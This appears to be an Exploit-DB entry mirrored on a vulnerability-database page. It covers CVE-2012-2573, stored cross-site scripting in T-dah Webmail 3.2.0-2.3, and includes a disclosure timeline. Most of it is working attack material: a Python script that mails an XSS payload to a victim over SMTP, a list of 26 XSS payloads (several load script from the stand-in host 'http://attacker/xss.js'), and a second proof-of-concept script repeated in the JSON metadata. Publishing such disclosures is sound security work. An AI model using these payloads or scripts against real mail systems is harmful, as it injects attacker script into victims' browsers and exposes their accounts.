Search...

t-dah webmail client 3.2.0-2.3 - Stored XSS

2012-08-08T00:00:00

ID EDB-ID:20364
Type exploitdb
Reporter loneferret
Modified 2012-08-08T00:00:00

Description

t-dah webmail client 3.2.0-2.3 - Stored XSS. CVE-2012-2573. Webapps exploit for php platform

                                        
                                            #!/usr/bin/python

'''

Author: loneferret of Offensive Security
Product: T-dah Webmail Client
Version: 3.2.0-2.3
Vendor Site: http://t-dahmail.sourceforge.net/index.php
Software Download: http://sourceforge.net/projects/t-dahmail/
Contact: http://t-dahmail.sourceforge.net/forum/

Timeline:
29 May 2012: Vulnerability reported to CERT
30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012
23 Jul 2012: Update from CERT: No response from vendor
08 Aug 2012: Public Disclosure

Installed On: Ubuntu Server LAMP 11.10
Client Test OS: Windows 7 Pro (x86) SP1
Browser Used: Internet Explorer 9

Injection Point: Body
Injection Payload(s):
1: &lt;SCRIPT SRC=http://attacker/xss.js&gt;&lt;/SCRIPT&gt; 
2: &lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;
3: ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&{} 
4: &lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt; 
5: exp/*&lt;XSS STYLE='no\xss:noxss("*//*");
xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'&gt; 
6: &lt;BODY ONLOAD=alert('XSS')&gt; 
7: &lt;IFRAME SRC="javascript:alert('XSS');"&gt;&lt;/IFRAME&gt;
8: &lt;DIV STYLE="width: expression(alert('XSS'));"&gt;
9: &lt;XSS STYLE="xss:expression(alert('XSS'))"&gt;
10: &lt;IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"&gt;
11: &lt;META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"&gt; 
12: &lt;META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"&gt; 
13: &lt;!--[if gte IE 4]&gt;
&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;
&lt;![endif]--
14: &lt;SCRIPT SRC="http://attacker/xss.jpg"&gt;&lt;/SCRIPT&gt; 
15: &lt;SCRIPT/XSS SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
16: &lt;/TITLE&gt;&lt;SCRIPT&gt;alert("XSS");&lt;/SCRIPT&gt; 
17: &lt;SCRIPT&gt;document.write("&lt;SCRI");&lt;/SCRIPT&gt;PT SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
18: &lt;SCRIPT a="&gt;'&gt;" SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
19: &lt;&lt;SCRIPT&gt;alert("XSS");//&lt;&lt;/SCRIPT&gt;
20: &lt;IMG """&gt;&lt;SCRIPT&gt;alert("XSS")&lt;/SCRIPT&gt;"&gt; 
21: &lt;SCRIPT&gt;a=/XSS/
alert(a.source)&lt;/SCRIPT&gt; 
22: &lt;SCRIPT a=`&gt;` SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
23: &lt;SCRIPT a="blah" '' SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
24: &lt;SCRIPT "a='&gt;'" SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
25: &lt;SCRIPT ="blah" SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt; 
26: &lt;SCRIPT a="&gt;" SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt;

'''


import smtplib, urllib2
 
payload = """&lt;SCRIPT/XSS SRC="http://attacker/xss.js"&gt;&lt;/SCRIPT&gt;"""
 
def sendMail(dstemail, frmemail, smtpsrv, username, password):
        msg  = "From: hacker@offsec.local\n"
        msg += "To: victim@victim.local\n"
        msg += 'Date: Today\r\n'
        msg += "Subject: XSS\n"
        msg += "Content-type: text/html\n\n"
        msg += "XSS" + payload + "\r\n\r\n"
        server = smtplib.SMTP(smtpsrv)
        server.login(username,password)
        try:
                server.sendmail(frmemail, dstemail, msg)
        except Exception, e:
                print "[-] Failed to send email:"
                print "[*] " + str(e)
        server.quit()
 
username = "hacker@offsec.local"
password = "123456"
dstemail = "victim@victim.local"
frmemail = "hacker@offsec.local"
smtpsrv  = "172.16.84.171"
 
print "[*] Sending Email"
sendMail(dstemail, frmemail, smtpsrv, username, password)

JSON Vulners Source

Initial Source

{"published": "2012-08-08T00:00:00", "id": "EDB-ID:20364", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "history": [], "enchantments": {"score": {"value": 5.0, "vector": "NONE"}, "vulnersScore": 5.0}, "hash": "0013f98f1ac214b4bd45215da55d36ecc54f8939d3edcacb5e63f2827382db52", "description": "t-dah webmail client 3.2.0-2.3 - Stored XSS. CVE-2012-2573. Webapps exploit for php platform", "type": "exploitdb", "href": "https://www.exploit-db.com/exploits/20364/", "lastseen": "2016-02-02T14:05:06", "edition": 1, "title": "t-dah webmail client 3.2.0-2.3 - Stored XSS", "osvdbidlist": ["84694"], "modified": "2012-08-08T00:00:00", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2573"], "sourceHref": "https://www.exploit-db.com/download/20364/", "references": [], "reporter": "loneferret", "sourceData": "#!/usr/bin/python\r\n\r\n'''\r\n\r\nAuthor: loneferret of Offensive Security\r\nProduct: T-dah Webmail Client\r\nVersion: 3.2.0-2.3\r\nVendor Site: http://t-dahmail.sourceforge.net/index.php\r\nSoftware Download: http://sourceforge.net/projects/t-dahmail/\r\nContact: http://t-dahmail.sourceforge.net/forum/\r\n\r\nTimeline:\r\n29 May 2012: Vulnerability reported to CERT\r\n30 May 2012: Response received from CERT with disclosure date set to 20 Jul 2012\r\n23 Jul 2012: Update from CERT: No response from vendor\r\n08 Aug 2012: Public Disclosure\r\n\r\nInstalled On: Ubuntu Server LAMP 11.10\r\nClient Test OS: Windows 7 Pro (x86) SP1\r\nBrowser Used: Internet Explorer 9\r\n\r\nInjection Point: Body\r\nInjection Payload(s):\r\n1: <SCRIPT SRC=http://attacker/xss.js></SCRIPT> \r\n2: <SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>\r\n3: ';alert(String.fromCharCode(88,83,83))//\\';alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//\\\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>\">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} \r\n4: <SCRIPT>alert('XSS')</SCRIPT> \r\n5: exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");\r\nxss:ex/*XSS*//*/*/pression(alert(\"XSS\"))'> \r\n6: <BODY ONLOAD=alert('XSS')> \r\n7: <IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>\r\n8: <DIV STYLE=\"width: expression(alert('XSS'));\">\r\n9: <XSS STYLE=\"xss:expression(alert('XSS'))\">\r\n10: <IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">\r\n11: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\"> \r\n12: <META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\"> \r\n13: <!--[if gte IE 4]>\r\n<SCRIPT>alert('XSS');</SCRIPT>\r\n<![endif]--\r\n14: <SCRIPT SRC=\"http://attacker/xss.jpg\"></SCRIPT> \r\n15: <SCRIPT/XSS SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n16: </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> \r\n17: <SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n18: <SCRIPT a=\">'>\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n19: <<SCRIPT>alert(\"XSS\");//<</SCRIPT>\r\n20: <IMG \"\"\"><SCRIPT>alert(\"XSS\")</SCRIPT>\"> \r\n21: <SCRIPT>a=/XSS/\r\nalert(a.source)</SCRIPT> \r\n22: <SCRIPT a=`>` SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n23: <SCRIPT a=\"blah\" '' SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n24: <SCRIPT \"a='>'\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n25: <SCRIPT =\"blah\" SRC=\"http://attacker/xss.js\"></SCRIPT> \r\n26: <SCRIPT a=\">\" SRC=\"http://attacker/xss.js\"></SCRIPT>\r\n\r\n'''\r\n\r\n\r\nimport smtplib, urllib2\r\n \r\npayload = \"\"\"<SCRIPT/XSS SRC=\"http://attacker/xss.js\"></SCRIPT>\"\"\"\r\n \r\ndef sendMail(dstemail, frmemail, smtpsrv, username, password):\r\n msg = \"From: hacker@offsec.local\\n\"\r\n msg += \"To: victim@victim.local\\n\"\r\n msg += 'Date: Today\\r\\n'\r\n msg += \"Subject: XSS\\n\"\r\n msg += \"Content-type: text/html\\n\\n\"\r\n msg += \"XSS\" + payload + \"\\r\\n\\r\\n\"\r\n server = smtplib.SMTP(smtpsrv)\r\n server.login(username,password)\r\n try:\r\n server.sendmail(frmemail, dstemail, msg)\r\n except Exception, e:\r\n print \"[-] Failed to send email:\"\r\n print \"[*] \" + str(e)\r\n server.quit()\r\n \r\nusername = \"hacker@offsec.local\"\r\npassword = \"123456\"\r\ndstemail = \"victim@victim.local\"\r\nfrmemail = \"hacker@offsec.local\"\r\nsmtpsrv = \"172.16.84.171\"\r\n \r\nprint \"[*] Sending Email\"\r\nsendMail(dstemail, frmemail, smtpsrv, username, password)\r\n", "objectVersion": "1.0"}

{"cve": [{"lastseen": "2016-09-03T16:38:53", "references": ["http://www.exploit-db.com/exploits/20364/"], "edition": 1, "description": "Multiple cross-site scripting (XSS) vulnerabilities in T-dah WebMail 3.2.0-2.3 allow remote attackers to inject arbitrary web script or HTML via an e-mail message body with (1) a SCRIPT element, (2) a crafted Cascading Style Sheets (CSS) expression property, (3) a CSS expression property in the STYLE attribute of an arbitrary element, (4) an ONLOAD attribute of a BODY element, (5) a crafted SRC attribute of an IFRAME element, (6) a crafted CONTENT attribute of an HTTP-EQUIV=\"refresh\" META element, or (7) a data: URL in the CONTENT attribute of an HTTP-EQUIV=\"refresh\" META element.", "reporter": "NVD", "published": "2012-08-12T17:55:01", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "title": "CVE-2012-2573", "type": "cve", "assessment": {"system": "", "name": "", "href": ""}, "bulletinFamily": "NVD", "cvelist": ["CVE-2012-2573"], "scanner": [], "modified": "2012-08-13T00:00:00", "cpe": ["cpe:/a:tdah:t-day_webmail:3.2.0-2.3"], "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2573", "id": "CVE-2012-2573", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-02T14:33:47", "osvdbidlist": ["85469", "84694", "85468"], "references": [], "edition": 1, "description": "T-dah Webmail Multiple Stored XSS. CVE-2012-2573. Webapps exploit for php platform", "reporter": "Shai rod", "published": "2012-08-17T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "T-dah Webmail Multiple Stored XSS", "bulletinFamily": "exploit", "cvelist": ["CVE-2012-2573"], "modified": "2012-08-17T00:00:00", "id": "EDB-ID:20579", "href": "https://www.exploit-db.com/exploits/20579/", "sourceData": "#!/usr/bin/python\r\n\r\n'''\r\n\r\n# Exploit Title: T-dah Webmail Multiple Stored XSS issues.\r\n# Date: 17/08/2012\r\n# Exploit Author: Shai rod (@NightRang3r)\r\n# Vendor Homepage: http://tdah.us/\r\n# Software Link: http://sourceforge.net/projects/t-dahmail/files/latest/download?utm_expid=6384-3&utm_referrer=http%3A%2F%2Fsourceforge.net%2Fprojects%2Ft-dahmail%2F\r\n# Version: 3.2.0\r\n \r\n#Gr33Tz: @aviadgolan , @benhayak, @nirgoldshlager, @roni_bachar\r\n\r\nAbout the Application:\r\n======================\r\n\r\nT-dah is an Open Sourced Universal Webmail origially developed by Aldoir Ventura under the name Uebimiau in which we picked up late in 2007.\r\nIt is free and can be installed on any server that supports PHP.\r\n\r\n\r\nVulnerability Description\r\n=========================\r\n\r\n1. XSS In message body (HREF)\r\n\r\nSend an email to the victim with the payload in the e-mail body.\r\nXSS Will be triggered when the user clicks the link.\r\n\r\nXSS Payload: <a href=javascript:alert(\"XSS\")>Click Me</a>\r\n\r\n2. Stored XSS in email body (Previously Discovered by loneferret - http://www.exploit-db.com/exploits/20364/).\r\n\r\nXSS Payload: <img src='1.jpg'onerror=javascript:alert(\"XSS\")>\r\n\r\nSend an email to the victim with the payload in the email body, once the user opens the message XSS should be triggered.\r\n\r\n\r\n3. Stored XSS contacts.\r\n\r\nAnother stored XSS can be triggered when crating a new contact, almost every field in the form is vulnerable\r\nfor example you can inject your payload <img src='1.jpg'onerror=javascript:alert(\"XSS\")> in the \"Name\" field, Save contact, XSS Shoud be triggerd.\r\n\r\n4. Stored XSS in Calendar\r\n\r\nAdd a new event to calendar and in the message field insert the javascript payload: <img src='1.jpg'onerror=javascript:alert(\"XSS\")>\r\nSave the event, XSS Should be truggered.\r\n\r\n\r\n'''\r\n\r\nimport smtplib\r\n\r\nprint \"###############################################\"\r\nprint \"# T-dah Webmail 3.2.0 Stored XSS POC #\"\r\nprint \"# Coded by: Shai rod #\"\r\nprint \"# @NightRang3r #\"\r\nprint \"# http://exploit.co.il #\"\r\nprint \"# For Educational Purposes Only! #\"\r\nprint \"###############################################\\r\\n\"\r\n\r\n# SETTINGS\r\n\r\nsender = \"attacker@localhost\"\r\nsmtp_login = sender\r\nsmtp_password = \"qwe123\"\r\nrecipient = \"victim@localhost\"\r\nsmtp_server = \"192.168.1.10\"\r\nsmtp_port = 25\r\nsubject = \"T-dah Webmail XSS POC\"\r\n\r\n# SEND E-MAIL\r\n\r\nprint \"[*] Sending E-mail to \" + recipient + \"...\"\r\nmsg = (\"From: %s\\r\\nTo: %s\\r\\nSubject: %s\\n\"\r\n % (sender, \", \".join(recipient), subject) )\r\nmsg += \"Content-type: text/html\\n\\n\"\r\nmsg += \"\"\"<img src='1.jpg'onerror=javascript:alert(\"XSS-1\")>\\r\\n\"\"\"\r\nmsg += \"\"\"<a href=javascript:alert(\"XSS-2\")>Click Me, Please...</a>\\r\\n\"\"\"\r\nserver = smtplib.SMTP(smtp_server, smtp_port)\r\nserver.ehlo()\r\nserver.starttls()\r\nserver.login(smtp_login, smtp_password)\r\nserver.sendmail(sender, recipient, msg)\r\nserver.quit()\r\nprint \"[+] E-mail sent!\"\r\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/20579/"}]}